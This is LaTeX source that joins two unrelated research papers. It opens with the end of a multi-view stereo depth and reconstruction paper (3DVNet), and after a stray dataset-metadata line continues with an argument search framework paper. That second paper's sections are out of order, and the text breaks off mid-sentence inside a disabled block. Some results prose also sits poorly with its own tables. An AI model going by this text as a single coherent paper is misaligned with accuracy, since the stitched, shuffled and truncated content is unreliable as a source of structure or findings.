Amongst these metrics, we consider Abs-rel, Abs-diff, and the first inlier ratio metric $\delta < 1.25$ as the most suitable 2D metrics for measuring depth prediction quality, and F-score as the most suitable 3D metric for measuring 3D reconstruction quality.
Following D\"uz\c{c}eker \etal~\cite{duzceker2020dvmvs}, we only consider ground truth depth values greater than 50 cm to account for some methods not being able to predict smaller depth.
We note F-score, Precision, and Recall are calculated per-scene and then averaged across all the scenes.
This results in a different F-score than when calculating from the averaged Precision and Recall reported.
\textbf{Protocols:} For depth-based methods, we fuse predicted depths using the standard multi-view consistency based point cloud fusion.
Based on results on validation sets, we modify the implementation of Galliani \etal \cite{galliani2015gaupuma} to use \textit{depth}-based multi-view consistency check, rather than a \textit{disparity}-based check (see Sec.~3.3 of the supplementary materials).
For volumetric methods, we use marching cubes to extract a mesh from the predicted TSDF.
Following Murez \etal~\cite{murez2020atlas}, we trim the meshes to remove geometry not observed in the ground truth camera frustums.
Additionally, ScanNet ground truth meshes often contain holes in observed regions.
We mask out these holes for all baselines to avoid false penalization.
All meshes are single layer to match ScanNet ground truth as noted by Sun \etal \cite{sun2021neucon}.
We use the DVMVS keyframe selection.
For depth-based methods, we use each keyframe as a reference image for depth prediction.
We use the 2 previous and 2 next keyframes as source images (4 source images total).
For depth-based methods, we resize the output depth map to $640 \times 480$ using nearest-neighbor interpolation.
For volumetric methods, we use the predicted mesh to render $640 \times 480$ depth maps for each keyframe.
\subsection{Evaluation Results and Discussion}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/depth_grid.png}
\end{center}
\vspace{-0.6cm}
\caption{Qualitative depth results on ScanNet. Our method produces sharp details with well defined object boundaries.}
\label{fig:depth-grid}
\end{figure*}
\begin{figure*}[t]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/rec_grid.png}
\end{center}
\vspace{-0.6cm}
\caption{Qualitative reconstruction results on ScanNet for the four best-performing methods. Our technique produces globally coherent reconstructions like purely volumetric methods while containing the local detail of depth-based methods.}
\label{fig:rec-grid}
\end{figure*}
See Tab.~\ref{tab:main-results} for 2D depth and 3D geometry metrics on all datasets.
Our method outperforms all baselines by a wide margin on most metrics.
Notably, our Abs-rel error on ScanNet is 0.021 less than the DVMVS fusion, the second best method, while the Abs-rel of the third, fourth, and fifth best methods are all within 0.002 of DVMVS fusion.
Similarly, Our ScanNet F-score is 0.09 more than GPMVS (FT), the second best method, while the F-score is within 0.001 of GPMVS (FT) for Atlas, the third best method.
This demonstrates the significant quantitative increase in both depth and reconstruction metrics of our method. Results on additional datasets show the strong generalization ability of our model.
We include qualitative results on ScanNet.
See Figs.~\ref{fig:depth-grid} and~\ref{fig:rec-grid}.
See Sec.~4 of the supplementary materials for additional qualitative results.
Our depth maps are visually pleasing, with clearly defined edges.
They are comparable in quality to those of GPMVS and DVMVS fusion while being quantitatively more accurate.
Our reconstructions are coherent like volumetric methods, without the noise present in other depth-based reconstructions, which we believe is a result of our volumetric scene encoding and refinement.
We do note one benefit of Atlas is its ability to fill large unobserved holes.
Though not reflected in the metrics, this leads to qualitatively more complete reconstructions.
Our system relies on depth maps and thus cannot do this as designed.
However, as a result of averaging across image features, Atlas produces meshes that are overly smooth and lack detail.
In contrast, our reconstructions contain sharper, better defined features than purely volumetric methods.
Finally, we note our system cannot naturally be run in an online fashion, requiring availability of all frames prior to use.
\begin{table}[t]
\begin{small}
\begin{center}
\begin{tabular}{c|c|c c c|g}
\thickhline
$l_o$ & $l_i$ & Abs-rel & Abs-diff & $\delta < 1.25$ & F-score\\
\hline
0 & 0 & 0.070 & 0.137 & 0.949 & 0.559 \\
\hline
1 & 1 & 0.050 & 0.100 & 0.965 & 0.651 \\
1 & 2 & 0.044 & 0.088 & 0.971 & 0.661 \\
1 & 3 & 0.043 & 0.086 & 0.972 & 0.664 \\
\hline
2 & 1 & 0.041 & 0.081 & 0.974 & 0.668 \\
2 & 2 & 0.040 & 0.079 & 0.975 & 0.667 \\
2 & 3 & 0.040 & 0.079 & 0.975 & 0.665 \\
\hline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics as a function of number of inner PointFlow-refinement iterations (denoted $l_i$) and number of outer-loop scene-modeling passes (denoted $l_o$).}
\label{tab:iters}
\end{small}
\end{table}
\begin{table}[t]
\begin{small}
\begin{center}
\begin{tabular}{c c c c|g}
\thickhline
Model & Abs-rel & Abs-diff & $\delta < 1.25$ & F-score\\
\hline
no 3d & 0.067 & 0.134 & 0.952 & 0.551 \\
single scale & 0.041 & 0.080 & 0.973 & 0.662 \\
avg feats & 0.043 & 0.082 & 0.975 & 0.656 \\
full & 0.040 & 0.079 & 0.975 & 0.665 \\
\hline
\end{tabular}
\end{center}
\vspace{-0.6cm}
\caption{Metrics for our ablation study. See Sec.~\ref{sec:additional-studies} for descriptions of each condition.}
\label{tab:ablation}
\end{small}
\end{table}
\subsection{Ablation and Additional Studies} \label{sec:additional-studies}
\textbf{Does Iterative Refinement Help?} We study the effect of each inner and outer loop iteration of our depth refinement. See Tab.~\ref{tab:iters}.
We exceed state-of-the-art metrics after 2 iterations.
3 additional iterations add continued improvement, confirming the effectiveness of iterative refinement.
By 5 iterations, our metrics have converged, with depth stabilizing and F-score decreasing slightly.
Interestingly, the final iteration appears slightly detrimental.
\textbf{Does Multi-Scale Scene Modeling Help?} To test this, we (1) completely remove our multi-scale scene encoding from the PointFlow refinement, and (2) only use the coarsest scale $\vect{V}_3$, respectively denoted ``no 3D" and ``single scale" in Tab.~\ref{tab:ablation}.
Without any scene-level information, our refinement breaks down, indicating the scene modeling is essential.
The single scale model does slightly worse, confirming the effectiveness of our multi-scale encoding.
\textbf{Do Multi-View Matching Features Help?}
We use a per-channel average instead of variance aggregation for each point in our feature-rich point cloud, denoted ``avg feats" in Tab.~\ref{tab:ablation}.
Most metrics, notably the F-score, suffer.
This supports our hypothesis that multi-view matching is more beneficial for reconstruction than averaging.
For additional studies, see the supplementary material.
\section{Conclusion}
We present 3DVNet, which uses the advantages of both depth-based and volumetric MVS.
We perform experiments with 3DVNet to show depth-based iterative refinement and multi-view matching combined with volumetric scene modeling greatly improves both depth-prediction \textit{and} reconstruction metrics.
We believe our 3D scene-modeling network bridges an important gap between depth prediction, image feature aggregation, and volumetric scene modeling and has applications far beyond depth-residual prediction.
In future work, we will explore its use for segmentation, normal estimation, and direct TSDF prediction.
\vspace{0.2cm}
\noindent\textbf{Acknowledgements: }Support for this work was provided by ONR grants N00014-19-1-2553 and N00174-19-1-0024, as well as NSF grant 1911230.
{\small
\bibliographystyle{ieee_fullname}
| 2024-02-18T23:40:11.262Z | 2021-12-02T02:10:27.000Z | algebraic_stack_train_0000 | 1,574 | 6,959 |
|
proofpile-arXiv_065-7732 |
\section{Approach}
\label{sec:Approach}
\label{sec:Approach:Overview}
In this section, we present the different steps of our framework: (1)~topic clustering, (2)~argument identification, and (3)~argument clustering according to topical aspects (see Figure~\ref{fig:Approach:Pipeline}).
\subsection{Topic Clustering}
\label{sec:Approach:DS}
First, documents are grouped into topics. Such documents can be individual texts or collections of texts under a common title, such as posts on Wikipedia or debate platforms. We compute the topic clusters using unsupervised clustering algorithms
and study the results of \textit{k-means} and \textit{HDBSCAN}~\cite{Campello2013} in detail.
We also take the $argmax$ of the tf-idf vectors and LSA~\cite{Deerwester1990} vectors directly into consideration
to evaluate how well topics are represented by single terms.
Overall, we consider the following models:
\begin{itemize}
\item $ARGMAX_{none}^{tfidf}$: We restrict the vocabulary size and the maximal document frequency to obtain a vocabulary representing topics with single terms. Thus, clusters are labeled with exactly one term by choosing the $argmax$ of these tf-idf document vectors.
\item $ARGMAX_{lsa}^{tfidf}$: We perform a dimensionality reduction with LSA on the tf-idf vectors. Therefore, each cluster is represented by a collection of terms.
\item $KMEANS_{none}^{tfidf}$: We apply the k-means clustering algorithm directly to tf-idf vectors and compare the results obtained by varying the parameter $k$.
\item $HDBSCAN_{umap}^{tfidf}$: We apply UMAP \cite{McInnes2018} dimensionality reduction on the tf-idf vectors. We then compute clusters using the HDBSCAN algorithm based on the resulting vectors.
\item $HDBSCAN_{lsa+umap}^{tfidf}$: Using the best parameter setting from the previous model, we apply UMAP dimensionality reduction on LSA vectors. Then, we evaluate the clustering results obtained with HDBSCAN while the number of dimensions of the LSA vectors is varied.
\end{itemize}
\subsection{Argument Identification}
\label{sec:Approach:SEG}
For the second step of our argument search framework, we propose the segmentation of sentences into argumentative units.
Related works define arguments either on document-level~\cite{Wachsmuth2017} or sentence-level~\cite{Levy2018}\cite{Stab2018}, while, in this paper, we define an argumentative unit as a sequence of multiple sentences. This yields two advantages:
(1)~We can capture the context of arguments over multiple sentences (e.g., claim and its premises);
(2)~Argument identification becomes applicable to a wide range of texts (e.g., user-generated texts).
Thus, we train a sequence-labeling model to predict for each sentence whether it
starts an argument, continues an argument, or is outside of an argument (i.e., \textit{BIO-tagging}). Based on the findings of \citet{Ajjour2017}, \citet{Eger2017}, and \citet{Petasis2019}, we use a BiLSTM over more complex architectures like BiLSTM-CRFs. The BiLSTM is better suited than a LSTM as the bi-directionality takes both preceding and succeeding sentences into account for predicting the label of the current sentence. We evaluate the sequence labeling results compared to a feedforward neural network as baseline classification model that predicts the label of each sentence independently of the context.
We consider two ways to compute embeddings over sentences with BERT~\cite{Devlin2018}:
\begin{itemize}
\item \emph{bert-cls}, denoted as $MODEL_{cls}^{bert}$, uses the $[CLS]$ token corresponding output of BERT after processing a sentence.
\item \emph{bert-avg}, denoted as $MODEL_{avg}^{bert}$, uses the average of the word embeddings calculated with BERT as a sentence embedding.
\end{itemize}
\subsection{Argument Clustering}
\label{sec:Approach:AS}
In the argument clustering task, we apply the same methods (k-means, DBSCAN) as in the topic clustering step to group the arguments within a specific topic by topical aspects. Specifically, we compute clusters of arguments for each topic and compare the performance of k-means and HDBSCAN with tf-idf, as well as \emph{bert-avg} and \emph{bert-cls} embeddings. Furthermore, we investigate whether calculating tf-idf within each topic separately is superior to computing tf-idf over
all arguments in the document corpus (i.e., across topics).
\section{Conclusion} %
\label{sec:Conclusion}
In this paper, we proposed an
argument search framework that
combines the keyword search with precomputed topic clusters for argument-query matching, applies a novel approach to argument identification based on sentence-level sequence labeling,
and
aggregates arguments via argument clustering.
Our evaluation with real-world data
showed that our framework can be used
to mine and search for arguments from unstructured text
on any given topic.
It
became clear that a full-fledged argument search requires a deep understanding of text and that the individual steps can still be improved.
We suggest future research on developing argument search approaches that are sensitive to different aspects of argument similarity and argument quality. %
\section{Evaluation}
\label{sec:Evaluation}
\subsection{Evaluation Data Sets}
\label{sec:Evaluation:Datasets}
In total, we use four data sets for evaluating the different steps of our argument retrieval framework.
\begin{enumerate}
\item \textbf{Debatepedia} is a debate platform that lists arguments to a topic on one
page, including subtitles, structuring the arguments into different aspects.\footnote{We use the data
available at \url{https://webis.de/}.\label{dataset:webis}}
\item \textbf{Debate.org} is a debate platform that is organized in rounds where each of two opponents submits posts arguing for their side. Accordingly, the posts might also include non-argumentative parts used for answering the important points of the opponent before introducing new arguments.\footref{dataset:webis}
\item \textbf{Student Essay} \cite{Stab2017} is widely used in research on argument segmentation \cite{Eger2017, Ajjour2017, Petasis2019}. Labeled on token-level, each document contains one major claim and several claims and premises. We can use this data set for evaluating argument identification.
\item \textbf{Our Dataset} is based on a debate.org crawl.\footref{dataset:webis} It is restricted to a subset of four out of the total 23 categories -- \textit{politics}, \textit{society}, \textit{economics} and \textit{science} -- and contains additional annotations.
3 human annotators familiar with linguistics segmented these documents
and labeled them as being of \emph{medium} or \emph{low quality}, to exclude low quality documents.
The annotators were then asked to indicate the beginning of each new argument and to label argumentative sentences summarizing the aspects of the post as \emph{conclusion} and \emph{outside of argumentation}. In this way, we obtained a ground truth of labeled arguments on a sentence level (Krippendorff's $\alpha=0.24$ based on 20 documents and three annotators).
A
description of the data set is provided online.\footnote{See
\url{https://github.com/michaelfaerber/arg-search-framework}.}
\end{enumerate}
\textbf{Train-Validation-Test Split.} We use the splits provided by \citet{Stab2017} for the student essay data set. The other data sets are divided into train, validation and test splits based on topics (15\% of the topics were used for testing).
\begin{table*}[tb]
\centering
\caption{Results of unsupervised topic clustering on the \emph{debatepedia} data set $-$ \%$n$:~noise examples (HDBSCAN)
}
\label{tab:Results:ClusteringUnsupervised}
\begin{small}
\resizebox{0.99\textwidth}{!}{
\begin{tabular}{@{}l rrrrr r rrrrr@{}}
\toprule
& \multicolumn{5}{c}{With noise}& &\multicolumn{5}{c}{\emph{Without noise}}\\
\cline{2-6} \cline{8-12}
& \#$Clust.$ & $ARI$ &$Ho$ & $Co$ & $BCubed~F_1$ & \%$n$ & \#$Clust.$ & $ARI$ &$Ho$ & $Co$ & $F_{1}$ \\
\midrule
$ARGMAX_{none}^{tfidf}$
&253 & 0.470 &0.849 & 0.829 & 0.591 & $-$ & $-$ & $-$ & $-$ & $-$ & $-$\\
$ARGMAX_{lsa}^{tfidf}$
&157 & 0.368 & 0.776& 0.866 & 0.561& $-$ & $-$ & $-$ & $-$ & $-$ & $-$\\
$KMEANS_{none}^{tfidf}$
&170 & \textbf{0.703} & 0.916 & 0.922 & 0.774 & $-$ & $-$ & $-$ & $-$ & $-$ & $-$ \\
$HDBSCAN_{none}^{tfidf}$
& 206 & 0.141 &0.790 & 0.870 & 0.677 & 21.1 &205 & 0.815 &0.955& 0.937 & 0.839\\
$HDBSCAN_{umap}^{tfidf}$
& 155 & 0.673 &0.900 & 0.931 & 0.786 & 4.3 & 154 & 0.779 &0.927& 0.952& 0.827\\
$HDBSCAN_{lsa + umap}^{tfidf}$
&162 & 0.694 & 0.912& 0.935& \textbf{0.799} & 3.6 &161 & 0.775 &0.932 &0.950 & 0.831\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\begin{table*}[tb]
\centering
\caption{Results of unsupervised topic clustering on the \emph{debate.org} data set
$-$ \%$n$:~noise examples (HDBSCAN)}
\label{tab:Results:ClusteringUnsupervisedORG}
\begin{small}
\resizebox{0.99\textwidth}{!}{
\begin{tabular}{@{}l rrrrr r rrrrr@{}}
\toprule
& \multicolumn{5}{c}{With noise}& &\multicolumn{5}{c}{\emph{Without noise}}\\
\cline{2-6} \cline{8-12}
& \#$Clust.$ & $ARI$ & $Ho$ &$Co$& $F_{1}$ & \%$n$ &\#$Clust.$ & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ \\
\midrule
$KMEANS_{none}^{tfidf}$ & 50 & \textbf{0.436} & 0.822 & 0.796 & \textbf{0.644} &$-$&$-$&$-$&$-$&$-$&$-$\\
$HDBSCAN_{umap}^{tfidf}$
& 20 & 0.354 &0.633& 0.791 & 0.479 & 7.1 & 19 & 0.401 & 0.648 & 0.831 & 0.502\\
$HDBSCAN_{lsa + umap}^{tfidf}$
&26 & 0.330 & 0.689 &0.777 & 0.520 & 5.8 & 25 & 0.355 & 0.701 & 0.790 &0.542\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\subsection{Evaluation Settings}
\label{sec:Evaluation:Methods}
We report the results by using the evaluation metrics
precision, recall and $F_1$-measure concerning the classification, and adjusted rand index (ARI), homogeneity (Ho), completeness (Co), and $BCubed~F_1$ score concerning the clustering.
\textbf{Topic Clustering.} We use HDBSCAN with the minimal cluster size of 2.
Regarding k-means,
we vary the parameter $k$ that determines the number of clusters. We only report the results of the best setting.
For the model $ARGMAX_{none}^{tfidf}$ we restrict the vocabulary size and the maximal document frequency of the tf-idf to obtain a vocabulary that best represents the topics by single terms. %
\textbf{Argument Identification.}
We use
a BiLSTM implementation with 200 hidden units and apply \textit{SigmoidFocalCrossEntropy}
as loss function.
Furthermore, we use the \emph{Adagrad} optimizer~\cite{Duchi2011} and train the model for 600 epochs, shuffling the data in each epoch, and keeping only the best-performing model as assessed on the validation loss. The baseline feed-forward neural network contains a single hidden dense layer of size 200 and gets compiled with the same hyperparameters.
As BERT implementation, we use DistilBERT~\cite{Sanh2019}. %
\begin{figure}[tb]
\centering
\includegraphics[width=0.78\linewidth]{images/subtopic_argument_correlation2}
\caption{Linear regression of arguments and their topical aspects for the \emph{debatepedia} data set.}%
\label{fig:Results:Correlation}
\end{figure}
\textbf{Argument Clustering.}
We estimate the parameter $k$ for the k-means algorithm for each topic using a linear regression based on the number of clusters relative to the number of arguments in this topic. As shown in Figure \ref{fig:Results:Correlation}, we observe a linear relationship between the number of topical aspects (i.e., subtopics) and the argument count per topic in the \emph{debatepedia} data set.
We apply HDBSCAN with the same parameters as in the topic clustering task (\emph{min\_cluster\_size}~=~2).
\section{Introduction}
\label{sec:Introduction}
Arguments are an integral part of
debates and discourse between people. For instance, journalists, scientists, lawyers, and managers often need to pool arguments and contrast pros and cons \cite{DBLP:conf/icail/PalauM09a}.
In light of this, argument search has been proposed to retrieve relevant arguments for a given query (e.g., \emph{gay marriage}).
Several argument search approaches have been proposed in the literature~\cite{Habernal2015,Peldszus2013}.
However, major challenges of argument retrieval still exist, such as identifying and clustering arguments concerning controversial topics %
and extracting arguments from a wide range of texts on a fine-grained level.
For instance, the argument search system args.me \cite{Wachsmuth2017} uses a keyword search to match relevant documents and lacks the extraction of individual arguments. In contrast, the ArgumenText \cite{Stab2018} applies keyword matching on single sentences to identify relevant arguments and neglects the context,
yielding rather shallow arguments.
Furthermore, IBM Debater \cite{Levy2018} proposes a rule-based extraction of arguments from Wikipedia articles utilizing prevalent structures to identify sentence-level arguments.
Overall, the existing approaches are lacking (a)~a semantic argument-query matching,
(b)~a segmentation of documents into argumentative units of arbitrary size, and (c)~a clustering of arguments
w.r.t. subtopics
for a fully equipped framework.
In this paper, we propose a novel argument search framework
that addresses these aspects
(see Figure~\ref{fig:Approach:Pipeline}):
During the \textit{topic clustering} step, we group argumentative documents by topics and, thus, identify the set of %
relevant documents for a given search query
(e.g., \textit{gay marriage}). To overcome the limitations of keyword search approaches, we rely on semantic representations via embeddings
in combination with established clustering algorithms.
Based on the relevant documents, the \textit{argument segmentation} step aims at identifying and separating arguments. We hereby understand arguments to consist of one or multiple sentences and propose a BiLSTM-based sequence labeling method. %
In the final \textit{argument clustering} step, we identify the different aspects of the topic at hand that are
covered
by the arguments identified in the previous step.
We evaluate all three steps of our framework based on
real-world data sets from several domains.
By
using the output of one framework's component as input for the subsequent component,
our evaluation is
particularly
challenging but
realistic. In the evaluation, we show that by using embeddings, text labeling, and clustering, we can extract and aggregate arguments from unstructured text to a considerable extent.
Overall, our framework
provides the basis for advanced
argument search in real-world scenarios with little training data.
\begin{figure*}[tb]
\centering
\includegraphics[width=0.99\textwidth]{images/new_approach.png}
\caption{Overview of our framework for argument search. %
}
\label{fig:Approach:Pipeline}
\end{figure*}
In total, we make the following contributions:
\begin{itemize}
\setlength\itemsep{0em}
\item We propose a novel argument search framework for fine-grained argument retrieval
based on topic clustering, argument identification, and argument clustering.\footnote{The source is available online at \url{https://github.com/michaelfaerber/arg-search-framework}.}
\item We provide a new evaluation data set for sequence labeling of arguments.
\item We evaluate all steps of our framework extensively based on four data sets.
\end{itemize}
In the following,
after discussing related work in Section~\ref{sec:RelatedWork},
we propose our argument mining framework in Section~\ref{sec:Approach}.
Our evaluation is presented in Section~\ref{sec:Evaluation}.
Section~\ref{sec:Conclusion} concludes the paper.
\section{Related Work}
\label{sec:RelatedWork}
\textbf{Topic Clustering. }
Various approaches for modeling the topics of documents have been proposed, such as Latent Dirichlet Allocation (LDA) and Latent Semantic Indexing (LSI).
Topic detection and tracking~\cite{Wayne00} and topic segmentation~\cite{Ji2003} have been pursued in detail in the IR community.
\citet{Sun2007} introduce an unsupervised method for
topic detection and topic segmentation of multiple similar documents.
Among others, \citet{Barrow2020}, \citet{Arnold2019}, and \citet{Mota2019} propose models for segmenting documents and assigning topic labels to these segments, but ignore arguments.
\textbf{Argument Identification. }
\label{sec:RelatedWork:ArgumentRecognition}
Argument identification can be approached on the \textit{sentence level} by deciding for each sentence whether it constitutes an argument. For instance, IBMDebater \cite{Levy2018} relies on a combination of rules and weak supervision for classifying sentences as arguments.
In contrast, ArgumenText \cite{Stab2018} does not limit its argument identification to sentences.
\citet{Reimers2019} show that contextualized word embeddings can improve the identification of sentence-level arguments.
Argument identification has been approached on the level of \textit{argument units}, too. Argument units are defined as different parts of an argument.
\citet{Ajjour2017} compare machine learning techniques
for argument segmentation on several corpora. %
The authors observe that
BiLSTMs mostly achieve the best results. %
Moreover, \citet{Eger2017} and \citet{Petasis2019} show
that using more advanced models, such as combining a BiLSTM with CRFs and CNNs, hardly improves the BIO tagging results. Hence, we also create a BiLSTM model for argument identification.
\textbf{Argument Clustering.}
\label{sec:RelatedWork:ArgumentClustering}
\citet{Ajjour2019a} approach argument aggregation by identifying non-overlapping \emph{frames}, defined as a set of arguments from one or multiple topics that focus on the same aspect.
\citet{Bar-Haim2020} propose an argument aggregation approach by mapping similar arguments to common \emph{key points}, i.e., high-level arguments.
They observe that models with BERT embeddings perform the best for this task.
\citet{Reimers2019} propose the clustering of arguments based on the similarity of two sentential arguments with respect to their topics.
Also here, a fine-tuned
BERT model is most successful for assessing the argument similarity automatically. %
Our framework, while being also based on BERT for argument clustering, can consist of several sentences, making it on the one hand more flexible but argument clustering on the other hand more challenging.
\textbf{Argument Search Demonstration Systems. } %
\label{sec:RelatedWork:Frameworks}
\citet{Wachsmuth2017} propose the argument search framework \textit{args.me}
using online debate platforms. %
The arguments are
considered
on document level.
\citet{Stab2018} propose the framework \textit{ArgumenText} for argument search. %
The retrieval of topic-related web documents
is based on keyword matching, while the argument identification is based on a binary sentence classification.
\citet{Levy2018} propose
\textit{IBM Debater} based on Wikipedia articles. Arguments are defined as single claim sentences that explicitly discuss a \emph{main concept} in Wikipedia
and that are identified via rules.
\textbf{Argument Quality Determination.}
Several approaches and data sets have been published on determining the quality of arguments \cite{DBLP:conf/acl/GienappSHP20,DBLP:conf/cikm/DumaniS20,DBLP:conf/aaai/GretzFCTLAS20}, which is beyond the scope of this paper.
\subsection{Evaluation Results}
\label{sec:Results}
In the following, we present the evaluation results for the tasks topic clustering, argument identification, and argument clustering.
\begin{table*}[h]
\centering
\caption{Results of the clustering of arguments of the \emph{debatepedia} data set by topical aspects. \emph{across topics}:~tf-idf scores are computed across topics, \emph{without noise}:~{HDBSCAN} is only evaluated on those examples which are not classified as noise.}
\label{tab:Results:ASUnsupervised}
\begin{small}
\resizebox{0.85\textwidth}{!}{
\begin{tabular}{@{}l l l cccc l@{}}
\toprule
Embedding & Algorithm & Dim. Reduction & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ & Remark\\
\midrule
tf-idf & HDBSCAN & UMAP & 0.076 & 0.343 &0.366& 0.390 & \\
tf-idf & HDBSCAN & UMAP & 0.015 & 0.285 &0.300& 0.341 &\emph{across topics} \\
tf-idf & HDBSCAN & $-$ & \textbf{0.085} & \textbf{0.371} &\textbf{0.409}& \textbf{0.407} & \\
tf-idf & k-means & $-$ & 0.058 & 0.335 &0.362& 0.397 & \\
tf-idf & k-means & $-$ & 0.049 & 0.314 &0.352& 0.402 &\emph{across topics} \\
\midrule
bert-cls & HDBSCAN & UMAP & 0.030 & 0.280 &0.298& 0.357 & \\
bert-cls & HDBSCAN & $-$ & 0.016 & 0.201 &0.324& 0.378 & \\
bert-cls & k-means & $-$ & 0.044 & 0.332 &0.326& 0.369 & \\
\midrule
bert-avg & HDBSCAN & UMAP & 0.069 & 0.321 &0.352& 0.389 & \\
bert-avg & HDBSCAN & $-$ & 0.018 & 0.170 &0.325& 0.381 & \\
bert-avg & k-means & $-$ & 0.065 & 0.337 &0.349& 0.399 & \\
\midrule
tf-idf & HDBSCAN & $-$ & 0.140 & 0.429 &0.451& 0.439 &\emph{without noise}\\
\bottomrule
\end{tabular}
}
\end{small}
\end{table*}
\begin{figure*}[h]
\centering
\includegraphics[width = 0.42\textwidth]{key_results/AS/hdbscan_scatterplot2}
\includegraphics[width = 0.42\textwidth]{key_results/AS/kmeans-bert_scatterplot2}
\caption{Argument clustering results (measured by $ARI$, $BCubed F_1$, and $homogeneity$) for HDBSCAN on tf-idf embeddings and k-means on \emph{bert-avg} embeddings.}
\label{fig:Results:Scatterplot}
\end{figure*}
\textbf{Topic Clustering.}
We evaluate unsupervised topic clustering based on the 170 topics from the \textit{debatepedia} data set. Given Table~\ref{tab:Results:ClusteringUnsupervised}, we see that density-based clustering algorithms, such as {HDBSCAN}, applied to tf-idf document embeddings are particularly suitable for this task and clearly outperform alternative clustering approaches. We find that their ability to handle unclear examples as well as clusters of varying shapes, sizes, and densities is crucial to their performance.
{HDBSCAN} in combination with a preceding dimensionality reduction step achieves an $ARI$ score of 0.779. However, these quantitative results must be considered from the standpoint that topics in the \emph{debatepedia} data set are overlapping and, thus, the reported scores are lower bound estimates.
When evaluating the clustering results for the \emph{debatepedia} data set qualitatively,
we find that many predicted clustering decisions are reasonable but evaluated as erroneous in the quantitative assessment. For instance,
we see that
documents on \textit{gay parenting}
appearing in the debate about \textit{gay marriage} can be assigned to a cluster with documents on \textit{gay adoption}.
Furthermore, we investigate the impact on the recall of relevant documents and observe a clear improvement of topic clusters over keyword matching for argument-query matching.
For instance, given the topic \emph{gay adoption}, many documents from debatepedia.org use related terms like \emph{homosexual} and \emph{parenting} instead of explicitly mentioning \emph{`gay'} and \emph{`adoption'} and, thus, cannot be found by a keyword search.
We additionally evaluate the inductive capability of our topic clustering approach by applying them to debates from debate.org (see Table~\ref{tab:Results:ClusteringUnsupervisedORG}). We observe that the application of the unsupervised clustering on tf-idf embeddings for debates from debate.org achieves a solid mediocre $ARI$ score of 0.436.
\textbf{Argument Identification.}
To evaluate the identification of argumentative units based on sentence-level sequence-labeling, we apply our approach to the \emph{Student Essay} data set (see Table~\ref{tab:Results:Segmentation}) and achieve a macro $F_1$ score of 0.705 with a BiLSTM-based sequence-learning model on sentence embeddings computed with BERT. Furthermore, we observe a strong influence of the data sources on the results for argument identification. For instance, in the case of the \textit{Student Essay} data set, information about the current sentence as well as the surrounding sentences is available yielding accurate segmentation results ($F_{1,macro}=0.71$, $F_{1,macro}^{BI}=0.96$).
\textbf{Argument Clustering.}
Finally, we proposed an approach to cluster arguments consisting of one or several sentences by topical aspects. We evaluate the clustering
based on tf-idf and BERT embeddings of the arguments (see Table~\ref{tab:Results:ASUnsupervised}). Overall, the performance of the
investigated argument clustering methods is considerably low. We find that this is due to the fact that information on topical aspects is scarce and often underweighted in case of multiple sentences.
Given Figure~\ref{fig:Results:Scatterplot}, we can observe that the performance of the clustering does not depend on the number of arguments.
\if0
\begin{table}
\centering
\caption{Confusion matrices of $BILSTM_{cls}^{bert}$: Rows represent ground-truth labels and columns represent predictions.\\Left: \emph{Student Essay} data set, Right: \emph{debate.org} data set.}
\label{tab:Results:CM}
\begin{small}
\begin{tabular}{c| ccc}
& B & I & O\\
\midrule
B&15 & 33 & 0\\
I&24 & 226 & 0 \\
O&39 & 94 & 2\\
\bottomrule
\end{tabular}
\hspace{1cm}
\begin{tabular}{c| ccc}
& B & I & O\\
\midrule
B&1 & 24 & 23\\
I&0 & 135 & 115 \\
O&0 & 50 & 85\\
\bottomrule
\end{tabular}
\end{small}
\end{table}
\begin{table*}[tb]
\centering
\caption{Overview of the topics with the highest $ARI$ scores for HDBSCAN and k-means.}
\label{tab:Results:BestTopics}
\begin{small}
\begin{tabular}{@{}l p{7cm} rr cccc @{}}
\toprule
&Topic & \#$Clust._{true}$ & \#$Clust._{pred}$ & $ARI$ & $Ho$ &$Co$ & $BCubed~F_1$ \\
\toprule
\multicolumn{8}{c}{\textbf{HDBSCAN based on tf-idf embeddings}}\\
\midrule
1 &Rehabilitation vs retribution
&2 &3 & 0.442 &1.000 &0.544 &0.793 \\
2 &Manned mission to Mars
&5 &6 &0.330 & 0.461&0.444 & 0.515\\
3 & New START Treaty
&5 &4 &0.265 &0.380 &0.483 &0.518 \\
4 &Obama executive order to raise the debt ceiling
&3 &6 & 0.247 &0.799 &0.443 &0.568 \\
5 &Republika Srpska secession from Bosnia and Herzegovina
&4 &6 &0.231 &0.629 &0.472 &0.534 \\
6& Ending US sanctions on Cuba
&11 &9 & 0.230&0.458 &0.480 &0.450 \\
\toprule
\multicolumn{8}{c}{\textbf{k-means based on \emph{bert-avg} embeddings}}\\
\midrule
1 &Bush economic stimulus plan
&7 &5 & 0.454 &0.640 &0.694 &0.697 \\
2 &Hydroelectric dams
&11 &10 &0.386 & 0.570&0.618 & 0.537\\
3 & Full-body scanners at airports
&5 &6 &0.301 &0.570 &0.543 &0.584 \\
4 &Gene patents
&4 &7 & 0.277 &0.474 &0.366 &0.476 \\
5 &Israeli settlements
&3 &4 &0.274 &0.408 &0.401 &0.609 \\
6& Keystone XL US-Canada oil pipeline
&2 &3 & 0.269&0.667 &0.348 &0.693 \\
\bottomrule
\end{tabular}
\end{small}
\end{table*}
\begin{figure}[tb]
\centering
\includegraphics[width=0.4\textwidth]{key_results/AS/ARI_two_models3}
\includegraphics[width=0.4\textwidth]{key_results/AS/ARI_hdbscan2}
\caption{Argument clustering consensus based on the $ARI$ between (top) HDBSCAN and k-means score and (bottom) HDBSCAN model and the ground-truth.}
\label{fig:Results:Hist}
\end{figure}
\begin{figure}[tb]
\centering
\includegraphics[width=0.7\linewidth]{images/subtopic_argument_correlation2}
\caption{Linear regression of arguments and their topical aspects for the \emph{debatepedia} data set.
\label{fig:Results:Correlation}
\end{figure}
\subsubsection{Topic Clustering}
\label{sec:Results:DS}
The results of the unsupervised clustering approach are shown in Table \ref{tab:Results:ClusteringUnsupervised}, based
